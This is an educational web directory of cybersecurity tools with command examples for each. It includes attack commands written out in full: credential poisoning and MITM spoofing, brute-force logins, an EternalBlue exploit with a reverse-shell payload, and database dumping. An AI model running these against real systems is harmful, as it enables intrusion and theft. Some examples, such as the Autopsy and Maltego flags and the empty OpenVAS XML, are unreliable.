Cyber Elite Academy
🔧 Cybersecurity Tools Directory
A comprehensive and curated collection of essential cybersecurity tools and utilities with detailed insights and practical usage examples to help students, ethical hackers, and security professionals get started with the right tools across the security testing lifecycle.
The tools listed in this directory are provided for educational and research purposes only. Always ensure you have proper authorization before testing any systems. Unauthorized use of these tools against systems you don't own or have permission to test may violate laws and regulations.
🌐 Network Tools
Network security tools help analyze, monitor, and secure network infrastructure. These tools assist in traffic analysis, protocol inspection, network mapping, and identifying vulnerabilities in network services and configurations.
The industry standard for network discovery and security auditing. Nmap uses IP packets to determine hosts available on a network, services they offer, operating systems, packet filters/firewalls in use, and dozens of other characteristics. Features include host discovery, port scanning with multiple techniques, service/version detection, OS fingerprinting, and the NSE (Nmap Scripting Engine).
Usage Example
Beginner# Basic scan of a single host nmap 192.168.1.1 # Scan network range with OS detection sudo nmap -O 192.168.1.0/24 # Comprehensive scan with service detection, OS fingerprinting, and scripts sudo nmap -sS -sV -sC -O -p- 192.168.1.100 -oA full_scan # Scan for specific vulnerability using NSE scripts nmap --script vuln 192.168.1.100
The world's foremost network protocol analyzer that lets you capture and interactively browse the traffic running on a computer network. Wireshark supports hundreds of protocols and media types, with powerful display filters and rich VoIP analysis. Features include live capture and offline analysis, deep inspection of protocols, decryption support for many protocols, and export to various file formats.
Usage Example
Intermediate# Capture packets on specific interface wireshark -i eth0 # Capture packets and write to file wireshark -i eth0 -w capture.pcap # Read from capture file wireshark -r capture.pcap # Filter HTTP traffic only wireshark -i eth0 -f "tcp port 80" # Filter by IP address wireshark -i eth0 -f "host 192.168.1.100" # Common display filters: # http.request.method == "GET" # tcp.port == 443 # ip.src == 192.168.1.1 # dns.qry.name contains "example.com" # tcp.flags.syn == 1 and tcp.flags.ack == 0 # Follow TCP stream (right-click packet → Follow → TCP Stream)
A powerful command-line packet analyzer that allows users to intercept and display TCP/IP and other packets being transmitted or received over a network. tcpdump provides a compact, lightweight alternative to GUI-based packet analyzers with flexible filtering capabilities. It's particularly useful for quick network troubleshooting, security monitoring, and scripting automated packet capture tasks.
Usage Example
Intermediate# Basic capture on interface sudo tcpdump -i eth0 # Capture and save to file sudo tcpdump -i eth0 -w capture.pcap # Read from capture file tcpdump -r capture.pcap # Filter by host sudo tcpdump -i eth0 host 192.168.1.100 # Filter by port sudo tcpdump -i eth0 port 80 # Filter by protocol sudo tcpdump -i eth0 icmp # Filter by network sudo tcpdump -i eth0 net 192.168.1.0/24 # Capture only TCP SYN packets sudo tcpdump -i eth0 'tcp[13] & 2 != 0' # Verbose output with packet contents sudo tcpdump -i eth0 -vvv -X # Limit number of packets sudo tcpdump -i eth0 -c 100
A versatile networking utility often called the "Swiss Army knife" of TCP/IP networking. Netcat can read and write data across network connections using TCP or UDP protocols. It's used for port scanning, transferring files, port redirection, proxying, and as a backdoor. Security professionals use it for network debugging, testing firewall rules, and creating ad-hoc network connections.
Usage Example
IntermediateA command-line oriented TCP/IP packet assembler/analyzer that can send custom TCP/IP packets and display target replies. Hping is useful for firewall testing, advanced port scanning, network testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, and performance testing. It supports TCP, UDP, ICMP, and RAW-IP protocols with a scripting engine for automation.
Usage Example
Advanced# Basic ping (ICMP) hping3 -1 192.168.1.100 # TCP SYN scan hping3 -S -p 80 192.168.1.100 # UDP scan hping3 -2 -p 53 192.168.1.100 # Flood mode (stress testing) hping3 -S -p 80 --flood 192.168.1.100 # Custom TCP flags hping3 -S -R -p 80 192.168.1.100 # Fragmented packets hping3 -f -p 80 192.168.1.100 # Spoof source IP hping3 -a 192.168.1.200 -S -p 80 192.168.1.100 # Traceroute mode hping3 --traceroute -S -p 80 example.com # Custom packet size hping3 -d 1000 -S -p 80 192.168.1.100 # Interactive mode hping3 -I eth0 -9 80
A LLMNR, NBT-NS and MDNS poisoner that answers specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. Responder is used during penetration tests to capture authentication challenges on a network, which can then be cracked offline or used in relay attacks. It implements several attack vectors to redirect traffic to the attacker's machine and capture credentials.
Usage Example
Advanced# Basic usage python Responder.py -I eth0 # Analyze mode (no poisoning) python Responder.py -I eth0 -A # Enable WPAD rogue proxy python Responder.py -I eth0 -wF # Disable SMB and HTTP servers python Responder.py -I eth0 -S -L # Specify challenge for NTLM hashes python Responder.py -I eth0 -c 1122334455667788 # Force NTLM authentication python Responder.py -I eth0 -P -v # Poison all requests (including local) python Responder.py -I eth0 --lm # Save captured hashes to file python Responder.py -I eth0 -o /path/to/hashes.txt # Use specific WPAD script python Responder.py -I eth0 --wpad-script /path/to/wpad.dat
A comprehensive suite for man-in-the-middle attacks on LAN. Ettercap features sniffing of live connections, content filtering on the fly, and many other interesting tricks. It supports active and passive dissection of many protocols (even encrypted ones) and includes many features for network and host analysis. Ettercap can be used for ARP poisoning, DNS spoofing, credential sniffing, and MITM attacks.
Usage Example
Advanced# Start GUI interface ettercap -G # ARP poisoning attack ettercap -T -q -M arp:remote /192.168.1.1// /192.168.1.100// # Sniff only (no MITM) ettercap -T -q -i eth0 # DNS spoofing ettercap -T -q -P dns_spoof -M arp /192.168.1.1// /192.168.1.100// -F dns_spoof # Credential sniffing ettercap -T -q -i eth0 -l ettercap.log # Filter HTTP POST data ettercap -T -q -M arp /192.168.1.1// /192.168.1.100// -F post_filter # SSL stripping ettercap -T -q -M arp /192.168.1.1// /192.168.1.100// -L sslstrip # Load plugins ettercap -T -q -M arp /192.168.1.1// /192.168.1.100// -P autoadd # Save captured data ettercap -T -q -i eth0 -w dump.pcap
The fastest Internet port scanner that can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second. Masscan uses asynchronous transmission and its own custom TCP/IP stack to achieve these speeds. While similar to Nmap in functionality, Masscan is optimized for speed rather than comprehensive scanning, making it ideal for large-scale network surveys.
Usage Example
Intermediate# Scan common ports on single host masscan 192.168.1.100 -p1-1024 # Scan specific ports on subnet masscan 192.168.1.0/24 -p80,443,22,3389 # Fast scan with rate limit masscan 192.168.1.0/24 -p1-65535 --rate 100000 # Scan from file masscan -iL targets.txt -p80 # Save results to file masscan 192.168.1.0/24 -p80 -oX scan_results.xml # Exclude hosts from scan masscan 192.168.1.0/24 -p80 --excludefile exclude.txt # Banner grabbing masscan 192.168.1.0/24 -p80 --banners # Custom source IP/port masscan 192.168.1.0/24 -p80 --source-ip 192.168.1.200 --source-port 60000 # Adapter selection masscan 192.168.1.0/24 -p80 -e eth0 # Read from pcap file masscan -r scan.pcap -oG scan.gnmap
A powerful, modular and portable MITM framework that provides various modules for network attacks and monitoring. Bettercap replaces older tools like Ettercap with more modern features including WiFi attacks, BLE, HID attacks, and more. It features a modular architecture, REST API, web UI, and scripting engine for automation. Common uses include ARP spoofing, DNS spoofing, SSL stripping, credential sniffing, and WiFi attacks.
Usage Example
Advanced# Start interactive session sudo bettercap -iface eth0 # ARP spoofing set arp.spoof.targets 192.168.1.100 set arp.spoof.fullduplex true arp.spoof on # Sniff network traffic net.sniff on # DNS spoofing set dns.spoof.domains example.com set dns.spoof.address 192.168.1.200 dns.spoof on # HTTP proxy for traffic manipulation set http.proxy.script http_proxy.js http.proxy on # WiFi attacks (requires compatible adapter) wifi.recon on wifi.deauth AP:BSSID # HID attacks (USB) hid.search hid.script keyboard_layout.js # BLE attacks ble.recon on ble.enum MAC # Run a script exec security_scan.cap # REST API sudo bettercap -eval "api.rest on"
🔐 Password Cracking Tools
Password cracking tools are essential components in security assessments for testing password policy strength, recovering access to systems, and validating cryptographic implementations. These tools employ various techniques including dictionary attacks, brute force, and rainbow tables.
The world's fastest and most advanced password recovery utility, leveraging GPU acceleration for unprecedented speeds. Hashcat supports over 300 hash types including MD5, SHA-1, SHA-2, WPA/WPA2, MS Office documents, and many database formats. It features multiple attack modes including dictionary attacks, rule-based attacks, hybrid attacks, brute-force, and mask attacks.
Usage Example
Intermediate# Crack MD5 hash using wordlist hashcat -m 0 -a 0 5f4dcc3b5aa765d61d8327deb882cf99 wordlist.txt # Crack SHA-256 hash with rules hashcat -m 1400 -a 0 hashes.txt wordlist.txt -r rules/best64.rule # Crack WPA/WPA2 handshake hashcat -m 22000 -a 0 capture.hccapx wordlist.txt # Mask attack for 8-character password (lowercase + digits) hashcat -m 0 -a 3 5f4dcc3b5aa765d61d8327deb882cf99 ?l?l?l?l?l?l?l?d # Show cracked passwords hashcat -m 0 hashes.txt --show # Benchmark to test performance hashcat -b
A versatile password cracking tool originally developed for Unix systems but now available on many platforms. John supports hundreds of hash and cipher types, including traditional crypt(3) password hashes, Windows LM hashes, and modern formats like bcrypt and Argon2. It features autodetection of hash types, customizable wordlist rules for intelligent mutations, and incremental mode for brute-force attacks.
Usage Example
BeginnerA hash cracker that implements the time-memory trade-off technique through rainbow tables. Unlike traditional brute force approaches that compute hashes in real-time, RainbowCrack uses precomputed tables to dramatically reduce the time needed to crack hashes at the expense of storage space. The tool includes rainbow table generation utilities, sorting tools for optimizing table performance, and a lookup engine.
Usage Example
Advanced# Generate small rainbow table for NTLM hashes (lowercase, 1-7 chars) rtgen ntlm loweralpha 1 7 0 1000 1000 0 # Sort rainbow table for better performance rtsort *.rt # Crack a hash using existing rainbow tables rcrack path/to/rainbow_tables/ -h 5f4dcc3b5aa765d61d8327deb882cf99 # Batch crack multiple hashes from a file rcrack path/to/rainbow_tables/ -f hashes.txt # Convert hash formats rt2rtc *.rt # Verify rainbow table integrity rtcheck *.rt
A parallelized network login cracker that supports numerous protocols including FTP, HTTP(S), SMTP, SMB, SSH, databases, LDAP, and many others. Hydra is extremely fast and flexible, allowing multiple connections per target to accelerate brute force and dictionary attacks against weak credentials. It features customizable attack patterns and throttling options to avoid detection.
Usage Example
Intermediate# SSH password brute force with wordlist hydra -l username -P /path/to/wordlist.txt ssh://192.168.1.100 # HTTP POST form attack hydra -l admin -P /path/to/passwords.txt 192.168.1.100 http-post-form "/login.php:username=^USER^&password=^PASS^:Login failed" # FTP brute force with username list and single password hydra -L /path/to/usernames.txt -p password123 ftp://192.168.1.100 # SMTP with specific port, exit on first valid result hydra -l [email protected] -P /path/to/wordlist.txt smtp://192.168.1.100:25 -f -V
🛠️ Penetration Testing Tools
Penetration testing tools are used to identify, exploit, and document security vulnerabilities in systems, networks, and applications. These tools simulate real-world attacks to help organizations understand their security posture and fix weaknesses before malicious actors can exploit them.
A Debian-based Linux distribution designed specifically for penetration testing and ethical hacking. Maintained by Offensive Security, Kali comes preloaded with over 600 specialized security tools organized by category. It supports live boot options, ARM architecture, and custom configurations, making it the industry standard for security professionals and red team operations.
Usage Example
Beginner
# Download Kali Linux ISO from https://www.kali.org/get-kali/
# Boot from USB or install in VM
# Update Kali and its tools
sudo apt update && sudo apt upgrade -y
# Launch tools through Applications menu or terminal
sudo nmap -sS 192.168.1.0/24 # Run a basic scan on local network
Developed by Rapid7, Metasploit is the world's most used penetration testing framework. It provides an extensive database of exploits for known vulnerabilities, a payload system for post-exploitation, and modules for reconnaissance and scanning. The framework includes msfconsole (CLI interface), Armitage (GUI), modules for developing custom exploits, and auxiliary tools for vulnerability verification.
Usage Example
Intermediate# Start Metasploit console sudo msfconsole # Search for exploits search cve:2021 type:exploit # Use a specific exploit use exploit/windows/smb/ms17_010_eternalblue # Set required options show options set RHOSTS 192.168.1.100 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.5 # Execute the exploit exploit
Created by PortSwigger, Burp Suite is an integrated platform for performing security testing of web applications. It acts as an HTTP proxy between your browser and target applications, allowing interception and modification of requests. Features include an automated scanner, intruder tool for customized attacks, repeater for request manipulation, and sequencer for testing session token randomness.
Usage Example
Intermediate# 1. Start Burp Suite and configure browser proxy settings to localhost:8080 # 2. Set up a browser to use Burp as proxy # Intercept a request 1. Turn on intercept in Proxy tab 2. Browse to target website 3. Modify request parameters 4. Click "Forward" to send modified request # Scan for vulnerabilities 1. Right-click on a request in the Proxy history 2. Select "Do active scan" (Pro version) or "Send to Intruder" 3. Configure scan settings and start scan
An advanced open-source tool designed to automate the detection and exploitation of SQL injection vulnerabilities in database servers. SQLmap supports a wide range of database management systems including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and SQLite. It features multiple injection techniques, database enumeration, data extraction, and file system access.
Usage Example
Intermediate# Basic scan against a URL parameter sqlmap -u "http://example.com/page.php?id=1" # Enumerate databases with a known vulnerable parameter sqlmap -u "http://example.com/page.php?id=1" --dbs # Get tables from a specific database sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables # Dump data from a specific table sqlmap -u "http://example.com/page.php?id=1" -D database_name -T users --dump # Test a POST parameter using request file sqlmap -r login_request.txt -p username
A complete suite of tools for auditing wireless network security. It can monitor (capturing packets), attack, test, and crack WiFi 802.11 networks. The suite includes airmon-ng (interface monitoring), airodump-ng (packet capture), aireplay-ng (packet injection for various attacks), and aircrack-ng (WEP/WPA-PSK key cracking).
Usage Example
Advanced# Put wireless card in monitor mode sudo airmon-ng check kill sudo airmon-ng start wlan0 # Capture traffic and find target networks sudo airodump-ng wlan0mon # Focus capture on target network (save to file) sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon # Deauthenticate client to capture handshake sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon # Crack WPA handshake using wordlist sudo aircrack-ng -w /path/to/wordlist.txt capture-01.cap
A free and open-source web application security scanner maintained by the OWASP Foundation. ZAP provides automated scanners and a set of tools for finding security vulnerabilities manually. Features include intercepting proxy, automated scanner, passive scanner for non-intrusive analysis, spider for discovering hidden content, and fuzzer for input validation.
Usage Example
Beginner
# Quick scan via UI
1. Start ZAP
2. Enter URL in "Quick Start" tab
3. Click "Attack" button
# Automated scan via command line
zap-cli quick-scan --self-contained \
--start-options "-config api.disablekey=true" \
https://example.com
# Manual testing workflow
1. Set browser proxy to localhost:8080
2. Browse to target application
3. Right-click request in history → "Active Scan"
4. Explore alerts in the "Alerts" tab
🧪 Malware Analysis Tools
Malware analysis tools help security professionals dissect, understand, and characterize malicious software. These tools enable both static analysis (examining code without execution) and dynamic analysis (observing behavior during execution) to develop effective detection and mitigation strategies.
Developed by the NSA and released as open-source in 2019, Ghidra is a powerful reverse engineering framework that helps analyze compiled code across multiple platforms including Windows, macOS, and Linux. It features a disassembler, decompiler for multiple architectures, graphical code browser, scripting support in Java and Python, and multi-user collaboration capabilities.
Usage Example
Advanced# Start Ghidra and create a new project 1. Launch Ghidra 2. File → New Project 3. Import file → Select binary file # Analyze binary file 1. Double-click imported file 2. Click "Yes" when prompted to analyze 3. Select default analyzers and click "Analyze" # Navigate and analyze code 1. Use Functions window to see entry points 2. Double-click function to view disassembly 3. Press "F5" to decompile current function 4. Right-click → "References" → "Find References To" to track usage # Create script to automate analysis 1. Window → Script Manager 2. Create New Script (Java or Python) 3. Edit and run script on current program
A Linux toolkit specifically designed for malware analysts created by Lenny Zeltser. This distribution comes pre-configured with a comprehensive collection of tools for examining malicious software, analyzing suspicious documents, and understanding browser-based threats. Tools are organized by function including static analysis, dynamic analysis, network traffic examination, and documentation.
Usage Example
Intermediate# Download and install REMnux # (as a dedicated VM or add to existing Linux) wget --quiet -O - https://remnux.org/get-remnux.sh | sudo bash # Static analysis of a suspicious file pescan suspicious_file.exe strings -a suspicious_file.exe | grep http # Analyze network traffic from a malware sample sudo remnux-network-setup sudo inetsim # Run malware in isolated VM with REMnux as gateway wireshark # Analyze suspicious document pdfid malicious.pdf pdf-parser -a malicious.pdf
An interactive malware analysis service that combines sandbox technology with a real-time graphical interface. Users can upload suspicious files or URLs, then observe the execution process including system changes, network communications, and process activities in real-time. Features include customizable virtual machines, MITRE ATT&CK mapping, and IOC extraction.
Usage Example
Beginner# Web-based service - visit https://any.run/ # Analyze a suspicious file 1. Register for a free account or use limited guest access 2. Click "New Task" 3. Upload file or provide URL 4. Configure environment (OS, network connectivity) 5. Click "Run" # Interact with the analysis 1. Observe real-time execution in VM window 2. Click on processes in the process tree 3. Review network connections and file activities 4. Download artifacts and IOCs through report tab
An open-source automated malware analysis system that safely executes suspicious files in isolated environments while monitoring their behavior. Cuckoo records comprehensive activity logs including file system changes, registry modifications, memory dumps, network traffic, and API calls. It provides detailed reports with behavioral analysis, static file properties, and artifact extraction.
Usage Example
Advanced# Installation (Ubuntu example) sudo apt install -y python virtualenv python-pip python-dev libffi-dev libssl-dev git clone https://github.com/cuckoosandbox/cuckoo.git cd cuckoo virtualenv venv . venv/bin/activate pip install -r requirements.txt # Start Cuckoo services cuckoo & cuckoo web runserver 0.0.0.0:8000 & # Submit a sample for analysis curl -F [email protected] http://localhost:8090/tasks/create/file # Check analysis results curl http://localhost:8090/tasks/report/1 # Alternative: Use web interface at http://localhost:8000
A specialized tool for performing static investigation of Windows executable files (PE files) without executing them. PEStudio identifies suspicious attributes and characteristics that may indicate malicious intent by analyzing headers, sections, imports, exports, resources, and digital signatures. It flags potentially dangerous API calls, suspicious strings, and compiler anomalies often associated with malware.
Usage Example
Beginner# Download from https://www.winitor.com/ # Launch PEStudio and analyze a file 1. Click "Open" to load the executable 2. Review highlighted sections: - Indicators (suspicious characteristics) - Resources (embedded files) - Imports (API calls) - Strings (embedded text) # Command line analysis (example using CLI features) pestudio.exe /xml /file=suspicious.exe > report.xml # Using filters to focus analysis 1. Click "Filters" button 2. Enable "Suspicious" and "Blacklisted" filters 3. Review filtered content in each tab
📂 Digital Forensics Tools
Digital forensics tools help investigators collect, preserve, analyze, and present digital evidence. These tools are critical for incident response, legal investigations, and understanding security breaches while maintaining evidence integrity and chain of custody.
An open-source digital forensics platform that serves as a graphical interface to The Sleuth Kit and other digital forensics tools. Autopsy enables investigators to analyze disk images, perform file recovery, conduct timeline analysis, and search for specific artifacts across multiple data sources. Key features include registry analysis, email analysis, web artifacts extraction, media file analysis, and hash filtering.
Usage Example
Intermediate# Autopsy is primarily GUI-based, but here are common operations: # Launch Autopsy autopsy # Create a new case from command line autopsy --createCase --caseName="CaseXYZ" --caseDir=/cases # Add a disk image to an existing case autopsy --addImage=/path/to/diskimage.dd --caseName="CaseXYZ" # Run in automated mode with a configuration file autopsy --autopsyConfig=/path/to/config.txt # Export case report # (Usually done through GUI: Case > Report > Generate Report)
An advanced memory forensics framework for incident response and malware analysis. Volatility allows investigators to extract information from running memory (RAM) dumps, revealing hidden processes, network connections, registry keys, and other artifacts that may not be visible on disk. The framework supports memory dumps from various operating systems including Windows, Linux, and macOS.
Usage Example
Advanced# Identify memory profile (OS version) volatility -f memory.dmp imageinfo # List running processes volatility -f memory.dmp --profile=Win10x64_19041 pslist # Examine process trees volatility -f memory.dmp --profile=Win10x64_19041 pstree # List network connections volatility -f memory.dmp --profile=Win10x64_19041 netscan # Dump process memory volatility -f memory.dmp --profile=Win10x64_19041 memdump -p 1234 -D ./output/ # List loaded DLLs for a process volatility -f memory.dmp --profile=Win10x64_19041 dlllist -p 1234 # Extract command history volatility -f memory.dmp --profile=Win10x64_19041 cmdscan # Scan for malware/rootkits volatility -f memory.dmp --profile=Win10x64_19041 malfind -D ./suspicious/
A forensic imaging tool used to acquire, analyze, and preserve digital evidence in a forensically sound manner. FTK Imager creates exact duplicates (forensic images) of computer data without altering the original evidence. It supports multiple image formats, hash verification, and can mount images as virtual drives for exploration. The tool provides features for previewing files, extracting specific items, and generating reports.
Usage Example
Beginner# FTK Imager is primarily GUI-based, but here are common operations: # Command-line imaging (CLI version) ftkimager.exe /path/to/source /path/to/output.E01 --case-number "CN123" --evidence-number "EV001" --description "System HDD" --examiner "John Smith" # Create forensic image with compression ftkimager.exe /dev/sdb output.E01 --compress 9 # Verify an image after creation ftkimager.exe output.E01 --verify # Create a raw/dd image ftkimager.exe /dev/sdb output.dd --raw # Split image into multiple segments (2GB each) ftkimager.exe /dev/sdb output.E01 --segment-size 2048M # Capture RAM ftkimager.exe --capture-memory mem.raw
A fast, easy-to-use tool for analyzing, reverse engineering, and extracting firmware images and other binary files. Binwalk can identify embedded files and executable code within firmware images, making it invaluable for IoT security research and embedded systems analysis. It features signature scanning, entropy analysis, and recursive extraction capabilities for common compression and archive formats.
Usage Example
Intermediate# Basic file analysis binwalk firmware.bin # Extract embedded files binwalk -e firmware.bin # Recursively extract and decompress files binwalk -Me firmware.bin # Show entropy analysis (useful for finding encrypted/compressed sections) binwalk -E firmware.bin # Disassemble executable code binwalk -A firmware.bin # Scan specific file format signature binwalk -R "\x50\x4B\x03\x04" firmware.bin # Compare two firmware images binwalk --diff firmware1.bin firmware2.bin # Use custom signature database binwalk -B --database=custom.db firmware.bin
🔍 OSINT & Reconnaissance Tools
Open Source Intelligence (OSINT) and reconnaissance tools help security professionals gather public information about targets to understand their digital footprint, potential vulnerabilities, and attack surfaces. These tools automate the collection and analysis of publicly available data from various sources.
A simple yet powerful OSINT gathering tool designed to collect email addresses, subdomains, hosts, employee names, open ports, and banners from different public sources. It leverages search engines, PGP key servers, LinkedIn, and various APIs to aggregate information about a target organization. The tool is particularly useful during the initial phases of penetration testing to understand an organization's attack surface.
Usage Example
Beginner# Basic domain search theHarvester -d example.com -b all # Search specific sources theHarvester -d example.com -b google,bing,linkedin # Limit results and specify output format theHarvester -d example.com -b all -l 500 -f output.html # Search with DNS brute forcing theHarvester -d example.com -b all -c -t -n # Use proxy for requests theHarvester -d example.com -b all -p 127.0.0.1:8080 # Search for specific data (emails) theHarvester -d example.com -b all -e # Active enumeration (DNS, shodan, etc.) theHarvester -d example.com -b all -a # Save results to multiple formats theHarvester -d example.com -b all -f myoutput -S
A powerful interactive data mining tool that renders directed graphs for link analysis. Maltego visualizes complex relationships between entities like people, companies, domains, DNS names, IP addresses, and documents. It leverages various transforms (plugins) to query public and private databases, APIs, and services to gather and connect information, making it ideal for complex investigations and threat intelligence gathering.
Usage Example
Advanced# Maltego is primarily GUI-based, but typical workflow includes: # Launch Maltego maltego # Command line start with specific configuration maltego -config=/path/to/config # Run from terminal with specific transform maltego -transform "Domain To IP" -input "example.com" # Common GUI operations: # 1. Create a new graph # 2. Drag a domain entity onto the graph # 3. Right-click > Run Transform > "To IP Addresses" # 4. Continue exploring with available transforms # 5. Save investigation or export results (XML, CSV, etc.) # Using Maltego with specific machine (automated workflows) # Select domain entity > Run Machine > "Company Stalker"
An open-source intelligence automation tool that integrates with over 200 data sources to gather intelligence on IP addresses, domain names, email addresses, and more. SpiderFoot automates the process of footprinting and OSINT collection, correlating data from diverse sources including web scraping, search engines, DNS records, WHOIS information, threat intelligence feeds, and numerous APIs.
Usage Example
Intermediate# Start SpiderFoot web interface spiderfoot -l 127.0.0.1:5001 # Run scan from command line sf.py -s example.com -m sfp_whois,sfp_dnsresolve -o tabs -q # Run all modules against a target sf.py -s example.com -a -o csv -q > results.csv # Use specific API keys sf.py -s example.com -a -k shodan_api_key:YOUR_KEY # Run modules related to specific categories sf.py -s example.com -t WEBSITE_CONTENT,CLOUD_SERVICES # Run specific modules silently sf.py -s 192.168.1.1 -m sfp_shodan,sfp_censys -q # Generate a report sf.py -s example.com -a -o json -q > example_report.json # Passive scan only (no direct target interaction) sf.py -s example.com -p -o csv -q > passive_results.csv
A powerful command-line tool designed to find usernames across a vast array of social networks and online platforms. Sherlock helps investigators track digital footprints by checking if a specific username exists on over 350 sites simultaneously. It provides detailed results including direct links to profiles found, making it invaluable for digital investigations, social media intelligence gathering, and identity research.
Usage Example
Beginner# Basic search for a single username sherlock username # Search for multiple usernames sherlock username1 username2 username3 # Save results to file sherlock username --output results.txt # Save results in specific format sherlock username --output results.csv --csv sherlock username --output results.json --json # Specify sites to search sherlock username --site twitter facebook instagram # Exclude specific sites sherlock username --exclude twitter facebook # Use a proxy sherlock username --proxy 127.0.0.1:8080 # Increase request timeout sherlock username --timeout 10 # Print all sites where username was found sherlock username --print-found # List all available sites sherlock --list
🛡️ Defensive Security Tools
Defensive security tools help organizations detect, prevent, and respond to security threats and vulnerabilities. These tools monitor networks and systems for suspicious activity, enforce security policies, and provide visibility into potential security incidents to protect digital assets.
An open-source network intrusion prevention and detection system (IDS/IPS) capable of real-time traffic analysis and packet logging. Snort uses a rule-based language to detect and prevent a wide variety of attacks including buffer overflows, stealth port scans, CGI attacks, SMB probes, and OS fingerprinting attempts. It can operate in three modes: sniffer, packet logger, and network IDS/IPS.
Usage Example
Advanced# Run Snort in sniffer mode snort -v # Display IP and TCP/UDP headers snort -vd # Display application layer data snort -vde # Log packets to a specific directory snort -l /var/log/snort # Run with a specific configuration file snort -c /etc/snort/snort.conf # Test configuration snort -T -c /etc/snort/snort.conf # IDS mode with specific rule set snort -A console -q -c /etc/snort/snort.conf -i eth0 # Read from PCAP file instead of network interface snort -r captured_traffic.pcap -c /etc/snort/snort.conf # Enable alerts in fast mode snort -c /etc/snort/snort.conf -A fast # Run Snort in inline IPS mode snort -Q --daq afpacket -i eth0:eth1 -c /etc/snort/snort.conf
A scalable, multi-platform, open-source Host-based Intrusion Detection System (HIDS) that performs log analysis, file integrity monitoring, policy monitoring, rootkit detection, and real-time alerting. OSSEC operates with a central manager that monitors multiple agent systems, making it suitable for enterprises with diverse environments. It can detect attacks that network-based systems might miss.
Usage Example
Intermediate# Install OSSEC server ./ossec-install.sh # Add an agent to OSSEC server /var/ossec/bin/manage_agents # Start OSSEC /var/ossec/bin/ossec-control start # Stop OSSEC /var/ossec/bin/ossec-control stop # Check OSSEC configuration /var/ossec/bin/ossec-logtest # View active response logs tail -f /var/ossec/logs/active-responses.log # View alerts tail -f /var/ossec/logs/alerts/alerts.log # Run integrity check manually /var/ossec/bin/syscheck_control -r # List available agents /var/ossec/bin/agent_control -l # Check agent status /var/ossec/bin/agent_control -i 001 # Restart specific agent /var/ossec/bin/agent_control -R -u 001
Open Vulnerability Assessment System (OpenVAS) is a comprehensive vulnerability scanning and management solution. It performs network vulnerability tests against connected devices to identify security issues, misconfigurations, and known vulnerabilities. OpenVAS includes a large and regularly updated feed of vulnerability tests, scheduled scanning capabilities, and detailed reporting options for remediation planning.
Usage Example
Intermediate# Start OpenVAS services gvm-start # Check OpenVAS setup gvm-check-setup # Create admin user (first time setup) gvmd --create-user=admin --password=strong_password # Command-line interface connection gvm-cli --gmp-username admin --gmp-password strong_password socket --socketpath /var/run/gvmd/gvmd.sock --xml "" # Create a target from CLI gvm-cli ... --xml " " # Create a scan task gvm-cli ... --xml " Target1 192.168.1.0/24 " # Start a scan gvm-cli ... --xml " Scan1 " # Get scan results gvm-cli ... --xml " " # Generate PDF report gvm-cli ... --xml " "
🧰 Other Essential Tools
These additional tools serve various specialized purposes in security testing, forensics, and defensive security. They help professionals analyze data, test specific systems, and decode or manipulate information during security operations and investigations.
A versatile web-based application for encryption, encoding, compression, and data analysis. CyberChef allows security professionals to chain operations together to perform complex data transformations through a simple graphical interface. It supports over 300 operations including hashing, encoding/decoding (Base64, hex, URL), encryption/decryption, data formatting, regex operations, and more.
Usage Example
Beginner# CyberChef is primarily web-based, but example "recipes" include: # Base64 decode From Base64 # URL decode then extract domains URL Decode Extract domains # Decrypt AES with known key and IV AES Decrypt - Key: (hex) 5f4dcc3b5aa765d61d8327deb882cf99 - IV: (hex) 00000000000000000000000000000000 - Mode: CBC # Convert hexdump to text From Hexdump Remove whitespace # Parse user agent strings Parse User Agent # Convert timestamp From UNIX Timestamp # Multiple hash generation MD5 SHA1 SHA256 # Analyze file magic bytes Magic
A WordPress security scanner that identifies vulnerabilities in WordPress installations, themes, and plugins. WPScan uses a constantly updated database of known security issues to check WordPress websites for outdated components, security misconfigurations, and vulnerabilities. It also includes features for username enumeration, brute force login attempts, and detecting security measures in place.
Usage Example
Intermediate# Basic scan wpscan --url https://example.com # Use API token for vulnerability database access wpscan --url https://example.com --api-token YOUR_TOKEN # Enumerate users wpscan --url https://example.com --enumerate u # Enumerate vulnerable plugins wpscan --url https://example.com --enumerate vp # Brute force login wpscan --url https://example.com --passwords /path/to/passwords.txt --usernames admin # Scan with aggressive detection wpscan --url https://example.com --stealthy --plugins-detection aggressive # Scan with random user agent wpscan --url https://example.com --random-user-agent # Output results to file wpscan --url https://example.com --output results.txt # Update vulnerability database wpscan --update